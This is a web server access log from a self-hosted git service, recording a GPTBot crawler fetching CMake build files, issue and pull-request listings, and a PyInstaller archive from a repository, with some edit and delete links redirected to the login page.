"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14348] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14347] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14346] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14346] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14336] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11374] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11370] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 11105] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:19:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:46:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1822591] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:19:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 